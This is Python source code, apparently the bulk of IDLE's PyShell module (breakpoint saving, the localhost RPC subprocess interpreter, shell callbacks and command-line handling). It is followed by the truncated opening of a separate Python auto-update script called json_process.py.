# investigated and understood. It's not clear if they are
# Tk issues or IDLE issues, or whether they can actually
# be fixed. Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
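        # Example: a single "BREAK" tag range of ("3.0", "5.0") yields [3, 4];
        # the second index of each pair is treated as an exclusive end line.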
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
# spawning first avoids passing a listening socket to the subprocess
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
        static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
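        # The cache entry follows linecache's (size, mtime, lines, fullname)
        # layout; because the name has the form <pyshell#N>, it is preserved
        # across linecache.checkcache() by the patch near the top of this file.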
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind TCP/IP port 8833, which is necessary to "
"communicate with its Python execution server. Either "
"no networking is installed on this computer or another "
"process (another IDLE?) is using the port. Run IDLE with the -n "
"command line switch to start without a subprocess and refer to "
"Help/IDLE Help 'Running without a subprocess' for further "
"details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if it lies before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
json_process.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import copy
import hashlib
import json
import os
import subprocess
import sys
import urllib.request
import zipfile
import shutil
import threading
import datetime
from dateutil.parser import parse
from threading import Timer
import wx
from fileIO import ifExist
import time
import platform
import ctypes
import PySimpleGUI as sg
from urllib import request
# ---------------------------------------
# Author : KingKa Wu
# Date : 2020-10-16
# Function : update json file process
# ---------------------------------------
check_update_time = 7200.0 # interval in seconds between automatic update checks
url_get_timeout = 10.0 # timeout in seconds when fetching files from the server
main_program_flag = 0 # flag: the main program must restart after this update
version_current_get = "1.4" # current tool version
update_messageCount = 0 # number of update prompts shown so far
###########################################################################################
# Added by Kingka 2020.12.2 for the update progress bar
global_filename = "" # name of the file currently being updated
global_percent = 0 # update progress as a percentage
bg = '#F0F0F0'
sg.SetOptions(background_color=bg, )
progressbar = [
